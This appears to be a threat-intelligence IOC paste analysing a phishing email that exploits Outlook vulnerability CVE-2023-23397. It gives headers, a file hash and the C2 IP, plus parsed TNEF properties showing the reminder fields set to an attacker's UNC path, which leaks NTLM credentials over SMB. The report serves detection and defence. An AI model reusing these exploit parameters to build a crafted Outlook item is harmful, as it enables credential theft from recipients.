VRad

#outlook_eop_160323

Mar 16th, 2023 (edited)
  1. #IOC #OptiData #VR #MSOutlook #EoP #SMB #NTLM
  2.  
  3. https://pastebin.com/FJDa0MA8
  4.  
  5. FAQ / vendor references:
  6. https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/
  7. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
  8. https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2023-exchange-server-security-updates/ba-p/3764224
  9. https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/
  10.  
  11. attack_vector
  12. --------------
  13. email with TNEF attachment lrmng.txt > CVE-2023-23397 exploit > Outlook Task item > UNC path \\85.195.206.7\lrmng\ > outbound SMB connection with NTLM negotiation request > exfiltration of the NTLM credentials to the attacker host
  14.  
  15. # # # # # # # #
  16. email_headers
  17. # # # # # # # #
  18. Return-Path: <officedip@alsaeedi.com>
  19. Received: from semf03.mfg.siteprotect.com (semf03.mfg.siteprotect.com [64.26.60.166])
  20. Received: from smtpauth02.mfg.siteprotect.com ([64.26.60.151])
  21. Received: from [127.0.0.1] (unknown [85.195.206.7])
  22. Content-Type: application/ms-tnef; name=lrmng.txt
  23. Content-Transfer-Encoding: base64
  24. Content-Disposition: attachment; filename=lrmng.txt
  25. From: officedip@alsaeedi.com
  26. Subject: Alarm!
  27. Message-ID: <37a46b6c-fe82-4e9f-a6c2-29a2d49fe99a@alsaeedi.com>
  28. Date: Thu, 16 Mar 2023 09:50:29 +0000
  29.  
  30. # # # # # # # #
  31. files
  32. # # # # # # # #
  33.  
  34. SHA-256 562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444
  35. File name lrmng.txt [CVE-2023-23397 exploit]
  36. File size 6.94 KB (7108 bytes)
  37.  
  38. # # # # # # # #
  39. activity
  40. # # # # # # # #
  41.  
  42. PL_SCR email attach
  43.  
  44. C2 85.195.206.7:445
  45.  
  46. netwrk
  47. --------------
  48. 85.195.206.7 445 SMB Negotiate Protocol Request
  49.  
  50. comp
  51. --------------
  52. System 85-195-206-7.init7.net 445 ESTABLISHED
  53.  
  54. proc
  55. --------------
  56. C:\Program Files (x86)\Microsoft Office\Office*\OUTLOOK.EXE
  57.  
  58. persist
  59. --------------
  60. n/a
  61.  
  62. drop
  63. --------------
  64. n/a
  65.  
  66.  
  67. # # # # # # # #
  68. additional info
  69. # # # # # # # #
  70.  
  71. TNEF parsed (excerpt of the attachment's MAPI properties; the listing is cut after MAPI_DELETE_AFTER_SUBMIT)
  72. --------------
  73. Note: the extended attributes 0x851e (PidLidReminderOverride, set to true) and 0x851f (PidLidReminderFileParameter, set to the UNC path \\85.195.206.7\lrmng) are the reminder properties that trigger the outbound SMB/NTLM negotiation described in attack_vector. The embedded Date Sent/Received values (2023-02-07) predate the SMTP Date header (2023-03-16), which suggests the TNEF item was built or reused from an earlier message — unconfirmed.
  73. "attributes": {
  74. "Date Modified": "2022-06-07 07:56:42",
  75. "Date Received": "2023-02-07 09:54:49",
  76. "Date Sent": "2023-02-07 09:54:49",
  77. "From": [
  78. "Joe.Smith@cert.au",
  79. "EX",
  80. "/o=BLIND/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=71ecf18295c14e82bcf212b9c8722a0e-Joe.Smith@cert.au"
  81. ],
  82. "Message Class": "IPM.Task",
  83. "Message ID": "14DBDC85E2926A4291B27D5C13103DBE",
  84. "Message Status": 33,
  85. "Priority": 1,
  86. "Subject": "ALARM!"
  87. },
  88. "extended_attributes": {
  89. "0x8103": false,
  90. "0x8112": 2,
  91. "0x8113": 1,
  92. "0x811c": false,
  93. "0x8123": -1000,
  94. "0x8124": false,
  95. "0x8127": "",
  96. "0x812a": 0,
  97. "0x812c": false,
  98. "0x851e": true,
  99. "0x851f": "\\\\85.195.206.7\\lrmng",
  100. "0x8580": "Joe.Smith@cert.au",
  101. "0x8581": "00000002\u0001/o=CERT/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=71ecf18295c14e82bcf212b9c8722a0e-Joe.Smith@cert.au",
  102. "0x85eb": 1033,
  103. "InTransitMessageCorrelator": "3\ufffd\ufffd\ufffd(u$K\ufffdus>\ufffdw(\ufffd",
  104. "MAPI_ACCESS": 7,
  105. "MAPI_ACCESS_LEVEL": 1,
  106. "MAPI_AGING_DONT_AGE_ME": false,
  107. "MAPI_ALTERNATE_RECIPIENT_ALLOWED": true,
  108. "MAPI_ANNIVERSARY_EVENT_ENTRY_ID": "",
  109. "MAPI_AUTO_LOG": 0,
  110. "MAPI_BIRTHDAY_EVENT_ENTRY_ID": "Joe.Smith@cert.au",
  111. "MAPI_CHANGE_KEY": "\ufffd\u001e'M\u000e\ufffd\ufffdH\ufffd\ufffdK\ufffd1\ufffd-o\u0000\u0000\u0000\u0000\u001a\ufffd",
  112. "MAPI_CLIENT_SUBMIT_TIME": "2023-02-07 16:54:49.696000",
  113. "MAPI_CONTACT_USER_FIELD1": 0,
  114. "MAPI_CONVERSATION_INDEX": "\u0001\ufffd;\u0014\ufffdK>\ufffd\ufffd\ufffd\u0013x@\ufffd\ufffd\b\ufffd/\ufffd\ufffd\ufffd\ufffd",
  115. "MAPI_CONVERSATION_INDEX_TRACKING": true,
  116. "MAPI_CONVERSATION_TOPIC": "LGBTQ+",
  117. "MAPI_CREATION_TIME": "2023-02-07 16:53:29.210000",
  118. "MAPI_CURRENT_VERSION_NAME": "16.0",
  119. "MAPI_DELETE_AFTER_SUBMIT": false,
  120.  
  121.  
  122. # # # # # # # #
  123. VT & Intezer
  124. # # # # # # # #
  125. https://www.virustotal.com/gui/file/562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444/details
  126.  
  127.  
  128. VR